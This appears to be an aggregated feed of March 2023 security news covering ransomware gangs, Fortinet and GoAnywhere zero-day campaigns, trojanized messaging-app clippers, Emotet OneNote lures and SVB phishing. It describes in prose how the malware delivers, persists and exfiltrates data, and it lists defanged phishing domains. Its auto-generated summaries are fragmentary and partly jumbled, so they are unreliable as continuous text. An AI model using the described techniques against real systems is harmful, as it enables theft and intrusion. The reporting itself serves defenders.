" Alternatively, on FortiManager devices that implement internet access restrictions, the threat actor is said to have pivoted from a FortiGate firewall compromised with CASTLETAP to drop a reverse shell backdoor named REPTILE ("/bin/klogd") on the network management system to regain access. "The US government released a joint advisory that provides technical details about the operation of the Lockbit 3.0 ransomware gang. The U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory that provides indicators of compromise (IOCs) and tactics, […]
The post US govt agencies released a joint alert on the Lockbit 3.0 ransomware appeared first on Security Affairs.
"Autosummary:
The U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) released a joint advisory that provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware. "Autosummary:
Warning when opening a file embedded in Microsoft OneNote Source: BleepingComputer If the user clicks on the OK button, the embedded click.wsf VBScript file will be executed using WScript.exe from OneNote"s Temp folder, which will likely be different for each user: "%Temp%\OneNote\16.0\Exported\{E2124F1B-FFEA-4F6E-AD1C-F70780DF3667}\NT\0\click.wsf" The script will then download the Emotet malware as a DLL Malicious Emotet Word document used earlier this month Source: BleepingComputer Due to this, BleepingComputer predicted that Emotet would switch to Microsoft OneNote files, which have become a popular method for distributing malware after Microsoft began blocking macros. "Kaspersky released a new version of the decryptor for the Conti ransomware that is based on the previously leaked source code of the malware. Kaspersky has published a new version of a decryption tool for the Conti ransomware based on previously leaked source code for the Conti ransomware. In March 2022, a Ukrainian security researcher […]
The post Kaspersky released a new decryptor for Conti-based ransomware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Conti) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnHowever, we would like to emphasize that the best strategy is to strengthen defenses and stop the attackers at early stages of their intrusion, preventing ransomware deployment and minimizing the consequences of the attack,” said Fedor Sinitsyn, lead malware analyst at Kaspersky. "Autosummary:
"The cybersecurity industry can leverage GPT-3 potential as a co-pilot to help defeat attackers, according to Sophos. The latest report details projects developed by Sophos X-Ops using GPT-3’s large language models to simplify the search for malicious activity in datasets from security software, more accurately filter spam, and speed up analysis of “living off the land” binary (LOLBin) attacks. “Since OpenAI unveiled ChatGPT back in November, the security community has largely focused on the potential … More
The post How ChatGPT is changing the cybersecurity game appeared first on Help Net Security.
"Autosummary:
Perhaps, but, at Sophos, we’ve long seen AI as an ally rather than an enemy for defenders, making it a cornerstone technology for Sophos, and GPT-3 is no different. "Approximately 10-16 percent of organizations have shown evidence of malicious command and control (C2) activities, strongly indicating a network breach within the last year, according to Akamai. Emotet and QSnatch Akamai observes nearly seven trillion DNS requests daily and classifies malicious DNS transactions into three main categories: malware, phishing and command and C2. These attacks present a major threat to both enterprises and home users. They analyzed malicious DNS data and linked attackers to malware … More
The post Tracking the global spread of malware appeared first on Help Net Security.
"Autosummary:
Affected devices Additional findings of the report include: 26 percent of affected devices have attempted to reach out to known initial access brokers (IAB) C2 domains, including Emotet-related domains. "BigID has introduced purpose-built AI and ML-based data discovery and classification capabilities designed to detect secrets across enterprise data and reduce risk from potential data breaches and leaks. Secrets – including as API keys, tokens, usernames and passwords, and security certificates – are commonly shared, cloned, and distributed across enterprise data environments as a means for better collaboration and efficiency. Unfortunately, the proliferation of secrets across these environments increases the attack surface and quickly raises … More
The post BIgID’s secrets detection capabilities reduce risk from potential data breaches and leaks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"After news broke late last week about Silicon Valley Bank’s bank run and collapse, security researchers started warning SVB account holders about incoming SVB-related scams and phishing attempts. Another reminder: just because caller ID says FDIC, SVB, or a phone number you trust, it doesn’t mean the call is for sure legit. Caller ID can be spoofed — we can make caller ID display any phone number when placing a call. Use another method of … More
The post SVB account holders targeted with phishing, scams appeared first on Help Net Security.
"Autosummary:
Mitiga CTO Ofer Maor has provided advice for companies that banked with SVB on how to safeguard themselves, their customers and suppliers, by increasing security awareness, making sure their processes around payment changes are robust, and by setting up additional monitoring of both account activity (phishing) and financial activity (BEC scams). "Autosummary:
"With DDoS attacks becoming more frequent, sophisticated, and inexpensive to launch, it"s important for organizations of all sizes to be proactive, stay protected all year round, and develop a DDoS response strategy," the tech giant"s Azure Network Security Team said. "Autosummary:
A third cluster is designed to keep tabs on Telegram conversations for certain Chinese keywords, both hard-coded and received from a server, related to cryptocurrencies, and if so, exfiltrate the complete message, along with the username, group or channel name, to a remote server. "An alleged Chinese threat actor group is behind attacks on government organizations exploiting a Fortinet zero-day flaw (CVE-2022-41328). A suspected China-linked group is exploiting a Fortinet zero-day vulnerability, tracked as CVE-2022-41328, in attacks aimed at government organizations. A few days ago, Fortinet researchers warned of an advanced threat actor that is targeting governmental or government-related […]
The post China-linked APT likely linked to Fortinet zero-day attacks appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Fortinet) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
"How cybercriminals can exploit Silicon Valley Bank"s downfall for their own ends and at your expense
The post SVB collapse is a scammer’s dream: Don’t get caught out appeared first on WeLiveSecurity
"Autosummary:
For BEC specifically: Check with a colleague before changing account details/approving payments for new accounts Double check any requests for account updates with the requesting organization: don’t reply to their email, verify independently from your records From a corporate IT security perspective: Run continuous, regular phishing training exercises for all staff, including simulations of currently trending attacks Consider gamification techniques which may help reinforce good behaviors Build BEC into staff security awareness training Invest in advanced email security solutions that include anti-spam, anti-phishing and host server protection and protect threats from even reaching their targets Update payment processes so that large wire transfers must be signed off by multiple employees We all need to be on the lookout for unexpected emails or calls – mainly those coming from a bank and requiring urgent action.Keep in mind not all are scammy, and not all scammy domains targeting SVB will have SVB-related terms: https://t.co/mHjfZQIQAf pic.twitter.com/Au7AbA0GhX — SecuritySnacks (@SecuritySnacks) March 13, 2023 SVB phishing attempts As always, phishing attempts focus on classic social engineering techniques such as: Using a breaking news story to lure the recipient in Spoofing SVB or other brands to gain recipient trust Creating a sense of urgency to force recipients to act without thinking – not hard given the circumstances surrounding the collapse Including malicious links/attachments to harvest information or steal funds Expect different threat actors to exploit the current situation with SVB.login-svb[.]com cash4svb[.]com svbclaim[.]com svbdebt[.]com pic.twitter.com/rn9ltBsxDU — Jaime Blasco (@jaimeblascob) March 12, 2023 Some phishing attempts have focused on stealing the details of SVB customers – possibly to either sell on the dark web or to create a phishing list of targets to hit with future scams. "The Cl0p ransomware gang claimed dozens of new victims in the past 24 hours, including energy giant Shell Global. The Cl0p ransomware gang has claimed dozens of new victims in the past 24 hours, including energy giant Shell Global, high-end jet manufacturer Bombardier Aviation, and several universities in the US, including Stanford, Colorado, and Miami. […]
The post Cl0p ransomware gang claims the hack of Shell, Bombardier, and Stanford U appeared first on Security Affairs.
"Autosummary:
Original post at https://cybernews.com/security/clop-ransomware-shell-bombardier-stanford-multiple-victims/ About the author: Stefanie Schappert, Senior journalist at Cyber News Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Cl0p ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
Spain, Saudi Arabia, Australia, Turkey, China, Switzerland, Japan, Colombia, Italy, and India lead the list of top countries infected by mobile financial threats. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @Seifreed, @Ionut_Ilascu, @Ax_Sharma, @malwrhunterteam, @struppigel, @BleepinComputer, @serghei, @fwosar, @billtoulas, @demonslay335, @kaspersky, @pcrisk, @ReliaQuest, @BrettCallow, and @Unit42_Intel. Quietman7 spotted new STOP ransomware variants appending the .craa, .qazx, and .qapo extensions March 12th 2023 A ransomware operation known as Medusa has begun to pick up steam in 2023, targeting corporate victims worldwide with million-dollar ransom demands. This has led to numerous data breach disclosures from companies, including Community Health Systems (CHS), Hatch Bank, Rubrik, and Hitachi Energy, with likely many more to come. "Categories: News Categories: Ransomware Tags: Rubrik Tags: GoAnywhere MFT Tags: Fortra Tags: Clop ransomware Tags: Clop Tags: ransomware Tags: CVE-2023-0669 Tags: zero-day Rubrik, a cloud data management company, has revealed that Clop made use of an infamous GoAnywhere flaw. |
The post Rubrik is latest victim of the Clop ransomware zero-day campaign appeared first on Malwarebytes Labs.
"Autosummary:
According to Mestrovich, the third-party investigators used by Rubrik confirmed that no personal information, such as Social Security Numbers (SSNs), financial accounts, and payment card numbers, were compromised.Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. "Categories: News Categories: Ransomware Tags: lockbit Tags: ransomware Tags: essendant Tags: data Tags: encrypt Tags: ransom Tags: leak Tags: website Tags: outage Tags: network The LockBit ransomware group has attacked Essendant, a US-based distributor of office products, and is threatening to leak its data. |
The post LockBit ransomware attacks Essendant appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.This attack, which is said to have begun on or around March 6, created severe ramifications for the organisation, disrupting freight carrier pickups, online orders, and access to customer support.Posted: March 17, 2023 by The LockBit ransomware group has attacked Essendant, a US-based distributor of office products, and is threatening to leak its data. "Microsoft has resolved 80 new CVEs this month in addition to four earlier CVEs, bringing the number of security issues addressed in this month"s Patch Tuesday release to 84.
Unfortunately, we have two zero-day flaws in Outlook (CVE-2023-23397) and Windows (CVE-2023-24880) that require a "Patch Now" release requirement for both Windows and Microsoft Office updates. As it was last month, there were no further updates for Microsoft Exchange Server or Adobe Reader. This month the team at Application Readiness has provided a helpful infographic that outlines the risks associated with each of the updates for this cycle.
Autosummary:
Windows lifecycle update This section contains important changes to servicing (and most security updates) to Windows desktop and server platforms over the next few months: Windows 10 Enterprise (and Education), Version 20H2 and Windows 10 IoT Enterprise, and Windows Version 20H2 will reach an end of servicing date on May 9, 2023. Unfortunately, we have two zero-day flaws in Outlook (CVE-2023-23397) and Windows (CVE-2023-24880) that require a "Patch Now" release requirement for both Windows and Microsoft Office updates. Browsers There were 22 updates for March (none rated critical), with 21 included in the Google release channel and one (CVE-2023-24892) from Microsoft. Each month, we break down the update cycle into product families (as defined by Microsoft) with the following basic groupings: Browsers (Microsoft IE and Edge). Testing guidance Each month, the team at Readiness analyzes the Patch Tuesday updates and provides detailed, actionable testing guidance; that guidance is based on assessing a large application portfolio and a detailed analysis of the Microsoft patches and their potential impact on the Windows platforms and application installations. "Hitachi Energy disclosed a data breach, the Clop ransomware gang stole the company data by exploiting the recent GoAnywhere zero-day flaw. Hitachi Energy disclosed a data breach, the company was hacked by the Clop ransomware gang that stole its data by exploiting the recently disclosed zero-day vulnerability in the GoAnywhere MFT (Managed File Transfer). The […]
The post Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Hitachi Energy) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Scammers are looking to cash in on the chaos that has set in following the startling meltdowns of Silicon Valley Bank and Signature Bank and the crisis at Credit Suisse
The post Banking turmoil opens opportunities for fraud – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"Phishing attacks have become increasingly prevalent and sophisticated, making it more difficult for individuals to protect themselves from these scams. In this Help Net Security video, Ofek Ronen, Software Engineer at Perception Point, discusses two-step phishing attacks, which are not only dangerous but also evasive, making them even more challenging to detect and avoid. Understanding the dangers of two-step phishing attacks and knowing what to look out for is critical in protecting yourself from falling … More
The post How two-step phishing attacks evade detection and what you can do about it appeared first on Help Net Security.
"Autosummary:
"Autosummary:
We derived three metrics that facilitate somewhat normalized comparisons across the industries in our client base: VOC scanning findings per asset, time to patch, Pentest findings per day of testing. In a similar comparison, limited only to Perimeter Security, and only Medium Sized business, Manufacturing ranks 1st with the most Incidents per Customer out of 7 comparable Industries. Pentesting findings We observe that the average CVSS Per Day was 4.81, compared to 3.61 on average for clients in all other sectors in the dataset – 33% higher. We note that 58% of the Incidents this industry deals with are internally caused, 32% were externally caused, 1% was classified as "Partner" or 3rd parties. Hunting for possible explanations Manufacturing is still the most impacted industry in our Cyber Extortion dataset in 2023, as tracked by monitoring double-extortion leak sites. "Autosummary:
CVE-2019-18935, in conjunction with CVE-2017-11317, has also been weaponized by a threat actor tracked as Praying Mantis (aka TG2021) to infiltrate the networks of public and private organizations in the U.S. Last month, CISA also added CVE-2017-11357 – another remote code execution bug affecting Telerik UI – to the Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. "Autosummary:
"Autosummary:
As you can see from the batch files below, the malicious files will pretend to perform an antivirus scan, showing a running percentage of time left, while quietly downloading a malicious payload using PowerShell. "Hornetsecurity launched VM Backup V9 – the newest version of its virtual machine (VM) backup, replication and recovery solution. This latest iteration offers ransomware protection leveraging immutable cloud storage on Wasabi and Amazon S3, with Microsoft Azure soon to follow. This new key feature enables customers to protect their backup data from ransomware by making their data tamper-proof for a defined period. A recent Hornetsecurity study revealed that 15% of ransomware attacks specifically targeted backups, … More
The post Hornetsecurity VM Backup V9 protects users against ransomware threats appeared first on Help Net Security.
"Autosummary:
Easy installation and newly overhauled backup repository VM Backup V9 has an easy-to-use, intuitive interface that gives individuals full control, allowing them to monitor and manage all Hyper-V and VMware VMs from a single console. "Multiple threat actors exploited a critical flaw in Progress Telerik to breach an unnamed US federal agency, said the US government. A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) revealed that multiple threat actors, including a nation-state actor, exploited a […]
The post Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency appeared first on Security Affairs.
"Autosummary:
A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) revealed that multiple threat actors, including a nation-state actor, exploited a critical vulnerability in Progress Telerik to breach an unnamed US federal agency. "US CISA added an actively exploited vulnerability in Adobe ColdFusion to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Adobe ColdFusion, tracked as CVE-2023-26360 (CVSS score: 8.6), to its Known Exploited Vulnerabilities Catalog. This week Adobe released security updates for ColdFusion versions 2021 and 2018 to resolve the critical flaw […]
The post CISA adds Adobe ColdFusion bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, CISA) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Earlier this week, I had tagged Axis Bank, India"s third-largest private bank, in a tweet but interestingly received a reply as a "quote tweet" from an account claiming to be Axis Bank: Reply to my tweet from a dubious @AXIS_BANK_00 Twitter account (BleepingComputer) Although the lack of any following on the @AXIS_BANK_00 account (and, not to mention, the verification badge) did raise red flags, it wouldn"t be the first time a company replies from a separate Twitter account as opposed to their verified one, for example, to minimize amplifying complaints from their customers sent as Tweets. "Autosummary:
BAILLOADER, for its part, is said to exhibit similarities with a crypter codenamed Tron that has been put to use by different adversaries to distribute Emotet, TrickBot, BazarLoader, IcedID, Conti ransomware, and Cobalt Strike. "ESET researchers analyzed Android and Windows clippers that can tamper with instant messages and use OCR to steal cryptocurrency funds
The post Not‑so‑private messaging: Trojanized WhatsApp and Telegram apps go after cryptocurrency wallets appeared first on WeLiveSecurity
"Autosummary:
In select cases we have seen the list of keywords expanded to eleven entries, specifically 助记词, Mnemonic, memorizing, Memorizing, recovery phrase, Recovery Phrase, wallet, METAMASKA, Phrase, secret, Recovery phrase. Cluster 4 The last identified cluster of Android clippers, Cluster 4, can not only replace cryptocurrency addresses, but also exfiltrate the victim’s Telegram data by obtaining their configuration files, phone number, device information, pictures, Telegram username, and the list of installed apps.Instead, they contain several modules with a wide range of functionalities, allowing the threat actors to perform actions such as stealing clipboard data, logging keystrokes, querying Windows Registry, capturing the screen, obtaining system information, and performing file operations.However, unlike the Android version, the victims will not be able to discover that their messages have been tampered with without comparing chat histories: even after restarting the app, the sender will always see the original version of the message since the relevant part of the code is executed again on application start; the recipient, on the other hand, will only receive the attacker wallet.While its source code certainly differs from the rest of the trojans discovered, its functionality is basically identical: it is capable of performing file operations, obtaining system information and the list of running programs, deleting profiles of commonly used browsers, downloading and running a potentially malicious file, and so on. Cluster 3 This cluster monitors Telegram communication for particular keywords in Chinese, such as “mnemonic”, “bank”, “address”, “account” and “Yuan”. Cluster 2 In contrast with Cluster 1, which employs advanced methods to aid in its malicious activities, the second cluster of Android clippers is the least complicated among the four: these malicious apps simply swap wallet addresses, without further malicious functionality.Once a Cluster 3 clipper recognizes a keyword, the whole message, along with the username, group or channel name, is sent to the C&C server, as can be seen in Figure 13. Do not store unencrypted pictures or screenshots containing sensitive information, such as mnemonic phrases, passwords, and private keys, on your device.Logging into these malicious versions of the Telegram app means that all the personal internal data stored within, such as messages, contacts, and configuration files, become visible to the threat actors. Similar to the first Windows clipper sample, any message sent using this malicious version of Telegram containing bitcoin, Ethereum, or TRON cryptocurrency wallet addresses will be modified to replace the addresses for those provided by the attacker (see Figure 16).However, it is possible that with Telegram, WhatsApp, and the Google Play app all being blocked in China, Android users there are used to jumping through several hoops if they want to obtain officially unavailable apps. Android trojans The main purpose of the trojanized Android apps is to intercept victims’ chat messages, and either swap any cryptocurrency wallet addresses for those belonging to the attackers, or exfiltrate sensitive information that would allow attackers to steal victims’ cryptocurrency funds.On the other hand, WhatsApp’s source code is not publicly available, which means that before repackaging the application with malicious code, the threat actors first had to perform an in-depth analysis of the app’s functionality to identify the specific places to be modified.Since Telegram is an open-source application, the cybercriminals only had to insert their own malicious code into an existing version and compile it; in the case of WhatsApp, however, the binary had to be modified directly and repackaged to add the malicious functionality. Regarding the Windows malware, there was a cluster of Telegram cryptocurrency clippers whose members simply intercept and modify Telegram messages in order to switch cryptocurrency wallet addresses, just like the second cluster of Android clippers. In the case of the attacks described in this blogpost, the threat actors first set up Google Ads leading to fraudulent YouTube channels, which then redirect the unfortunate viewers to copycat Telegram and WhatsApp websites, as illustrated in Figure 1. While the fake websites offer download links for all operating systems where Telegram and WhatsApp are available, all Linux and macOS links, as well as most iOS links, redirect to the services’ official websites.The trojans in Cluster 2 mostly replace addresses for bitcoin, Ethereum, and TRON coin wallets, with a few of them also being able to switch wallets for Monero and Binance.The threat actors purchased Google Ads (see Figure 3) that redirect to YouTube, which both helps the attackers to get to the top of search results, and also avoids getting their fake websites flagged as scams, since the ads link to a legitimate service that Google Ads presumably considers very trustworthy. Windows trojans As opposed to the trojanized Android apps we discovered, the Windows versions consist not only of clippers, but also of remote access trojans. "Polish intelligence dismantled a cell of Russian spies that gathered info on military equipment deliveries to Ukraine via the EU member. Polish counter-intelligence has dismantled a cell of Russian spies that gathered information on the provisioning of military equipment to Ukraine via the EU member. “The ABW counter-intelligence agency has arrested nine people suspected of […]
The post Polish intelligence dismantled a network of Russian spies appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Polish intelligence) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Based on the list of affected chipsets provided by Samsung, the list of affected devices includes but is likely not limited to: Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21, A13, A12 and A04 series; Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series; The Pixel 6 and Pixel 7 series of devices from Google; any wearables that use the Exynos W920 chipset; and any vehicles that use the Exynos Auto T5123 chipset. "Autosummary:
Files in the APK asset folder (CheckPoint) A costly problem According to South Korean government stats, vishing (voice phishing) is a problem that has cost victims in the country $600 million in 2020 alone, while there have been 170,000 reported victims between 2016 and 2020. "Autosummary:
" While jointly investigating the incident with Fortinet, Mandiant found that, after breaching the Fortinet devices, UNC3886 backdoored them using two new malware strains for continued access to the victims" networks: a Python-based Thincrust backdoor and the ICMP port-knocking Castletap passive backdoor. "Autosummary:
Abusing legitimate services Adobe Acrobat Sign is a free-to-try cloud-based e-signature service allowing users to send, sign, track, and manage electronic signatures. "Autosummary:
According to Kaspersky, the decrytor can recover files encrypted by the modified Conti variant that used the following name pattern and extensions: <file_name>.KREMLIN <file_name>.RUSSIA <file_name>.PUTIN Conti ransomware"s demise For about three years, the Conti gang ran one of the most active and lucrative ransomware-as-a-service operations, targeting big organizations and demanding large ransoms to decrypt the data they locked. "Autosummary:
"Russia-linked threat actors targeted at least 17 European nations in 2023, and 74 countries since the start of the invasion of Ukraine. Microsoft revealed that Russia-linked threat actors targeted at least 17 European nations between January and mid-February 2023. According to a report published by the IT giant, the state-sponsored hackers have targeted 74 countries […]
The post Microsoft sheds light on a year of Russian hybrid warfare in Ukraine appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Ukraine) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Extortion without encryption Encrypting files, data theft, and threatening to leak stolen files is known as a "double extortion" tactic, which serves as an additional form of coercion for ransomware gangs looking to increase pressure on their victims. "Categories: News Categories: Ransomware Tags: Wymondham College Tags: ransomware attack Tags: ransomware Tags: Vice Society Tags: National Cyber Security Centre Tags: NCSC Wymondham College is operating as normal, with a few expected distruptions that may be minimal but lasting. |
The post Ransomware attack hits ANOTHER school appeared first on Malwarebytes Labs.
"Autosummary:
Once you"ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.The school didn"t provide additional information, but Jonathan Taylor, chief of the school"s parent company Sapientia Education Trust, has revealed the school is yet to receive a ransom note. "Canonical is partnering with MediaTek to meet the growing demands of the IoT industry, reduce development costs and accelerate time-to-market. By partnering to enable Ubuntu on the Genio platform, MediaTek and Canonical will make it easier for developers, innovators and the embedded community to take advantage of this power-efficient, high-performance IoT SoC. The collaboration ensures developers and enterprises can create reliable and secure devices, benefiting from up to 10 years of enterprise-grade Ubuntu support, security … More
The post Canonical collaborates with MediaTek to optimize Ubuntu for IoT innovations appeared first on Help Net Security.
"Autosummary:
Aiming to further the deployment of Arm-based solutions, Ubuntu Core, the secure, application-centric OS optimised for embedded devices, is now available on SystemReady-certified arm64 systems, with the MediaTek Genio 1200 becoming the first platform to enable Ubuntu Core on SystemReady IR. Reliable and efficient over-the-air updates With the modern proliferation of IoT devices, delivering reliable software updates to low-powered, inaccessible, and often remotely administered embedded systems is significantly challenging. "While massive public data breaches rightfully raise alarms, the spike in malware designed to exfiltrate data directly from devices and browsers is a key contributor to continued user exposure, according to SpyCloud. The 2023 report identified over 22 million unique devices infected by malware last year. Of the 721.5 million exposed credentials recovered by SpyCloud, roughly 50% came from botnets, tools commonly used to deploy highly accurate information-stealing malware. These infostealers enable cybercriminals to work … More
The post Exfiltration malware takes center stage in cybersecurity concerns appeared first on Help Net Security.
"Autosummary:
Cybercriminals can easily access critical business applications Cybercriminals have doubled down and exploited the economic downturn, growing hybrid workforce, ghost accounts from terminated employees, and increased outsourcing, which elevates third-party exposure. "Today, phishing is the fastest growing Internet crime, and a threat to both consumers and businesses. Finance, technology, and telecom brands were the most commonly impersonated industries, notably for the unprecedented access and financial benefit that bank accounts, email and social media, and phone companies can give attackers, according to Cloudflare. The challenge of phishing URLs By masquerading as a reputable source – sometimes with an enticing request, other times with a severe consequence – … More
The post Top 50 most impersonated brands by phishing URLs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"If you are developing a modern medical, manufacturing, or logistics facility, there’s no doubt that a large portion of your investment was made into the electronic aspects of your device. Sensors, connected devices, and machinery are synchronized to deliver a streamlined experience. For facility operators, this includes elevators, HVAC systems, PLC controls, valves, pumps, and a whole slew of systems that we don’t think of as ‘connected.’ And that’s precisely the problem. Many of the … More
The post How Mirel Sehic relies on simplicity to focus on product security appeared first on Help Net Security.
"Autosummary:
For facility operators, this includes elevators, HVAC systems, PLC controls, valves, pumps, and a whole slew of systems that we don’t think of as ‘connected.’ Studying engineering, mechanics, and robotics, Mirel Sehic cut his teeth on process control environment and PLC to control valves and pumps in manufacturing sites, oil rigs, and other places.Homes, airports, federal buildings, academic institutions, warehouses, and others all have unique challenges that must be addressed.Now, if it’s a standard premium commercial building, you may say, ‘okay, I need to fix that right away’. How SBOMs can help in the coming years While the concept of a software ‘ingredient list’, known as a Software Bill of Materials (SBOM), has been around for some time, we are only recently starting to see it become required by regulatory and oversight bodies. Requests for SBOMs are only going to increase since, if we think about it, “the huge majority of the applications we use today contain some element of open source code,” said Sehik. "Data security firm Rubrik discloses a data breach, attackers exploited recent GoAnywhere zero-day to steal its data. Cybersecurity firm Rubrik disclosed a data breach, a ransomware group stolen compeny data by exploiting the recently disclosed zero-day vulnerability in the Fortra GoAnywhere secure file transfer platform. The company was the victim of a large-scale campaign targeting […]
The post Security Firm Rubrik breached by Clop gang through GoAnywhere Zero-Day exploitation appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Moshen Dragon) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
“The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication” - Microsoft However, exploiting the issue requires more technical details, which came shortly after Microsoft released the fix from researchers at security consulting company MDSec. "Autosummary:
"In addition to applying mitigations, CISA, FBI, and MS-ISAC recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory," the three organizations also recommended. "Autosummary:
"Autosummary:
"Minh Quốc Nguyễn, 49, of Hanoi, Vietnam, was charged today in Philadelphia with money laundering, operating an unlicensed money transmitting business and identity theft, connected to the operation of ChipMixer," announced the U.S. Department of Justice in a press statement. "Autosummary:
Detecting AI-generated content Source: Specops You can use this tool to help identify AI generated text: https://gptzero.me/. Social Engineering on the rise with ChatGPT From fake support requests, to caller ID spoofing, and now even scripting with ChatGTP. The user can be verified with a one-time code sent to the mobile number associated with their Active Directory account, or even with existing authentication services, like Duo Security, Okta, PingID, and Symantec VIP. Furthermore, since the ChatGPT model is open-source, an enterprising individual could create a dataset of existing company-generated emails to create a tool that quickly and easily produces phishing emails. "Autosummary:
"Autosummary:
Hive Ransomware The Cybersecurity and Infrastructure Security Agency (CISA), together with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), published a joint alert about the Hive ransomware group, which targeted a wide range of businesses and infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health. The ALPHV ransomware gang, aka BlackCat, claimed responsibility for the cyberattack against Creos and added it to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. On December 29, the LockBit ransomware gang took responsibility for the attack against the port, claiming to have stolen financial reports, audits, budgets, contracts, ship logs and other information about cargo and crews.The data leaked includes bank account details, dates of birth, next-of-kin information, national insurance numbers and tax information, health and well-being information, disciplinary and grievance related documents, etc.The attackers used known vulnerabilities (CVE-2022-24521, CVE-2020-1472), phishing, PowerShell scripts, KerberCache tool, compromised credentials and RDP to gain access, then used the Hancitor loader to drop their ransomware.From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries.According to the company’s statement, data that was unlawfully accessed potentially included personal information (including names, emails, addresses, taxpayer identification numbers, and banking information of affected individuals and businesses). U-blox U-blox, a Swiss company that creates wireless semiconductors and modules for consumer, automotive and industrial markets, said on October 28 that it had been targeted by a ransomware attack, which was detected and contained on October 24. Tata Power On October 14, the largest Indian energy company, Tata Power Company Limited, confirmed that it was targeted by a cyberattack, which affected its IT infrastructure. EPM In December, Empresas Públicas de Medellín (EPM), a Colombian energy provider, was hit with a ransomware attack, which disrupted the company’s operations and took down online services.The hackers uploaded a sample of the stolen files, including employment contracts, supplier contracts, files on various employees, documents detailing executive compensation packages, and more.Information stolen by the attackers may have included employee names, addresses, dates of birth, direct deposit information, ethnicity, and Social Security numbers. Elbit Systems Elbit Systems of America, a subsidiary of Israeli defense contractor Elbit Systems, confirmed a data breach, several months after a ransomware gang claimed to have hacked the company’s systems. The RansomEXX ransomware gang took responsibility for the “malicious cyberactivity” and for stealing 29.9GB of files pertaining to non-disclosure agreements, passports, IDs, contracts, and supply agreements. The company didn’t name the attacker, but BleepingComputer, which saw a ransom note on one of Semikron systems, reported that LV Ransomware might be behind the attack and that they claim to have stolen two terabytes of company data. Eurocell Eurocell, a UK-based PVC-U manufacturer, was hit by a cyberattack, which led to critical personal details of employees being leaked.The main targets of Cuba ransomware attacks are financial services, government, healthcare and public health, critical manufacturing, and information technology. "Autosummary:
FBI has issued multiple advisories, Private Industry Notifications (PINs), and flash alerts in recent years, warning of ransomware attacks against critical infrastructure, including Healthcare and First Responder networks, Water and Wastewater Systems, the Food and Agriculture sector, and education institutions. "Autosummary:
Braves, Bulldogs, Falcons, Hawks, Freedom (@KTrill311) March 9, 2023 The fact I haven"t been able to do my job for most of this week is unacceptable @Essendant — Derek (@DerekHasSeaLegs) March 9, 2023 The "network outage" is ransomware As of March 14th, LockBit ransomware gang has claimed responsibility for the cyber attack on Essendant. "Autosummary:
